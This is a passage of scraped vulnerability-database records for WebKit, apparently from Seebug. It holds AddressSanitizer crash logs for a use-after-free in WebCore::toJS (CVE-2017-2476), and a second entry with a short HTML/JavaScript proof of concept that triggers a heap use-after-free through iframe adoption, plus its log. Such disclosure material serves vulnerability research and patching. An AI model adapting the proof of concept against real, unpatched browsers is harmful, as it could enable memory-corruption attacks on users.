WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88ef83)\r\n #19 0x1150ec9aa in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88e9aa)\r\n #20 0x115020db5 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c2db5)\r\n #21 0x114f311df in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d31df)\r\n #22 0x114f2be4e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6cde4e)\r\n #23 0x11528c8e1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2e8e1)\r\n #24 0x115289dfa in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2bdfa)\r\n #25 0x114f4996d in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6eb96d)\r\n #26 0x11544048d in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe248d)\r\n #27 0x114fddb1c in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77fb1c)\r\n #28 0x114fa287e in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x74487e)\r\n #29 0x114fa5a53 in WebCore::DocumentLoader::continueAfterContentPolicy(WebCore::PolicyAction) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x747a53)\r\n #30 0x114fa407d in WebCore::DocumentLoader::responseReceived(WebCore::ResourceResponse const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x74607d)\r\n #31 0x114fa0a92 in WebCore::DocumentLoader::handleSubstituteDataLoadNow() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x742a92)\r\n #32 0x11250aeaa in WTF::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18d4eaa)\r\n #33 0x7fff9d2f6af3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92af3)\r\n #34 0x7fff9d2f6782 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92782)\r\n #35 0x7fff9d2f62d9 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x922d9)\r\n #36 0x7fff9d2ed7d0 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x897d0)\r\n #37 0x7fff9d2ece37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)\r\n #38 0x7fff9b506934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)\r\n #39 0x7fff9b50676e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)\r\n #40 0x7fff9b5065ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)\r\n #41 0x7fff91794df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)\r\n #42 0x7fff91794225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)\r\n #43 0x7fff91788d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)\r\n #44 0x7fff91752367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)\r\n #45 0x7fff96d41193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)\r\n #46 0x7fff96d3fbbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)\r\n #47 0x10cf0cb73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)\r\n #48 0x7fffa08505ac in start (/usr/lib/system/libdyld.dylib+0x35ac)\r\n\r\n0x61a000076e80 is located 0 bytes inside of 1376-byte region [0x61a000076e80,0x61a0000773e0)\r\nfreed by thread T0 here:\r\n #0 0x10f50bcf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)\r\n #1 0x11255181f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x191b81f)\r\n #2 0x111cb4d58 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107ed58)\r\n #3 0x111cb355e in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107d55e)\r\n #4 0x111cb2003 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107c003)\r\n #5 0x111cb17e6 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107b7e6)\r\n #6 0x111cb143a in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x107b43a)\r\n #7 0x111f2b905 in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f5905)\r\n #8 0x111f26e74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f0e74)\r\n #9 0x111f268e8 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f08e8)\r\n #10 0x111f2775e in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f175e)\r\n #11 0x115a154b9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b74b9)\r\n #12 0x115a15104 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b7104)\r\n #13 0x115a1504b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b704b)\r\n #14 0x115a14e17 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b6e17)\r\n #15 0x115a1457c in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b657c)\r\n #16 0x115a14746 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11b6746)\r\n #17 0x115f0dc3a in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x16afc3a)\r\n #18 0x1154ddca8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc7fca8)\r\n #19 0x115b8e39c in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x133039c)\r\n #20 0x116d5dfb1 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24fffb1)\r\n #21 0x10d20ba77 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x2eba77)\r\n #22 0x10d208c18 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x2e8c18)\r\n #23 0x10d4d2fc4 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x5b2fc4)\r\n #24 0x1247b2b61 in -[OpenSearchURLFinderController _jsContext] (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0x330b61)\r\n #25 0x1247b28b9 in -[OpenSearchURLFinderController initWithBundleFrame:] (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0x3308b9)\r\n #26 0x124523a29 in Safari::BrowserBundlePageController::determineOpenSearchURL(Safari::WK::BundleFrame const&) (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0xa1a29)\r\n #27 0x1245239a3 in invocation function for block in Safari::BrowserBundlePageController::determineOpenSearchURLSoon() (/System/Library/StagedFrameworks/Safari/Safari.framework/Safari+0xa19a3)\r\n #28 0x7fffa0df7deb in __NSFireTimer (/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation+0xa9deb)\r\n #29 0x7fff9d2f6af3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x92af3)\r\n```\r\n\r\npreviously allocated by thread T0 here:\r\n```\r\n #0 0x10f50b790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)\r\n #1 0x7fff948155a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)\r\n #2 0x11255b314 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1925314)\r\n #3 0x1125505db in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x191a5db)\r\n #4 0x1124e8635 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b2635)\r\n #5 0x1124e7918 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b1918)\r\n #6 0x1175c6389 in WebCore::XMLHttpRequest::create(WebCore::ScriptExecutionContext&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2d68389)\r\n #7 0x11644fc8c in WebCore::JSDOMConstructor<WebCore::JSXMLHttpRequest>::construct(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1bf1c8c)\r\n #8 0x111f0df2e in JSC::LLInt::handleHostCall(JSC::ExecState*, JSC::Instruction*, JSC::JSValue, JSC::CodeSpecializationKind) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d7f2e)\r\n #9 0x111f08149 in JSC::LLInt::setUpCall(JSC::ExecState*, JSC::Instruction*, JSC::CodeSpecializationKind, JSC::JSValue, JSC::LLIntCallLinkInfo*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d2149)\r\n #10 0x111f17827 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12e1827)\r\n #11 0x111f17502 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12e1502)\r\n #12 0x111f10aca in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12daaca)\r\n #13 0x111bca172 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf94172)\r\n #14 0x111b4fa33 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf19a33)\r\n #15 0x11123d5c1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6075c1)\r\n #16 0x11123d6eb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6076eb)\r\n #17 0x11123da36 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x607a36)\r\n #18 0x1158ea62e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x108c62e)\r\n #19 0x115bde086 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1380086)\r\n #20 0x115123415 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c5415)\r\n #21 0x115122f3f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8c4f3f)\r\n #22 0x1150ebe35 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88de35)\r\n #23 0x1150ecf83 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88ef83)\r\n #24 0x1150ec9aa in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x88e9aa)\r\n #25 0x115020db5 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c2db5)\r\n #26 0x114f311df in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d31df)\r\n #27 0x114f2be4e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6cde4e)\r\n #28 0x11528c8e1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2e8e1)\r\n #29 0x115289dfa in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa2bdfa)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x138c4df) in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::EventTarget&)\r\nShadow bytes around the buggy address:\r\n 0x1c340000ed80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c340000ed90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c340000eda0: 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc\r\n 0x1c340000edb0: fc fc fc fc fc fc fc fc fc fc fc fa fa fa fa fa\r\n 0x1c340000edc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x1c340000edd0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c340000ede0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c340000edf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c340000ee00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c340000ee10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c340000ee20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==25184==ABORTING\r\n```", "cvss3": {}, "published": "2017-04-05T00:00:00", "type": "seebug", "title": "WebKit: WebCore::toJS use-after-free\uff08CVE-2017-2476\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2476"], "modified": "2017-04-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92904", "id": "SSV:92904", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:00:00", "description": "This is a regression test from: https://crbug.com/541206.\r\nBut I think it seems not possible to turn it into an UXSS in WebKit.\r\n\r\nPoC:\r\n```\r\n<body>\r\n<script>\r\n\r\nvar s = document.body.appendChild(document.createElement('script'));\r\ns.type = '0';\r\ns.textContent = 'document.body.appendChild(parent.i0)';\r\n\r\nvar i0 = s.appendChild(document.createElement('iframe'));\r\ns.type = '';\r\n\r\nvar f = document.body.appendChild(document.createElement('iframe'));\r\nf.contentDocument.adoptNode(i0);\r\nf.src = 'about:blank';\r\n\r\n</script>\r\n</body>\r\n```\r\n\r\nAsan Log:\r\n```\r\n==54938==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a0000c5a80 at pc 0x0001151d388b bp 0x7fff584254c0 sp 0x7fff584254b8\r\nREAD of size 8 at 0x61a0000c5a80 thread T0\r\n #0 0x1151d388a in WTF::TypeCastTraits<WebCore::FrameView const, WebCore::ScrollView const, false>::isType(WebCore::Widget const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7788a)\r\n #1 0x115c355e8 in WebCore::FrameView::convertToContainingView(WebCore::IntPoint const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xad95e8)\r\n #2 0x1176e8df7 in WebCore::ScrollView::contentsToContainingViewContents(WebCore::IntPoint const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x258cdf7)\r\n #3 0x1176af5d4 in WebCore::ScrollingCoordinator::absoluteEventTrackingRegionsForFrame(WebCore::Frame const&) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25535d4)\r\n #4 0x1176afb10 in WebCore::ScrollingCoordinator::absoluteEventTrackingRegions() const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2553b10)\r\n #5 0x115298ff9 in WebCore::AsyncScrollingCoordinator::frameViewLayoutUpdated(WebCore::FrameView&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x13cff9)\r\n #6 0x115c140f9 in WebCore::FrameView::performPostLayoutTasks() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xab80f9)\r\n #7 0x115c1c24a in WebCore::FrameView::layout(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xac024a)\r\n #8 0x11586e89e in WebCore::Document::implicitClose() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x71289e)\r\n #9 0x115bdf621 in WebCore::FrameLoader::checkCompleted() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa83621)\r\n #10 0x115bdcafa in WebCore::FrameLoader::finishedParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa80afa)\r\n #11 0x11588c12d in WebCore::Document::finishedParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x73012d)\r\n #12 0x115d8f14d in WebCore::HTMLDocumentParser::prepareToStopParsing() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc3314d)\r\n #13 0x11592316c in WebCore::DocumentWriter::end() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7c716c)\r\n #14 0x1158e622f in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a22f)\r\n #15 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)\r\n #16 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)\r\n #17 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)\r\n #18 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)\r\n #19 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)\r\n #20 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)\r\n #21 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)\r\n #22 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)\r\n #23 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)\r\n #24 0x107df7b2e in std::__1::function<void 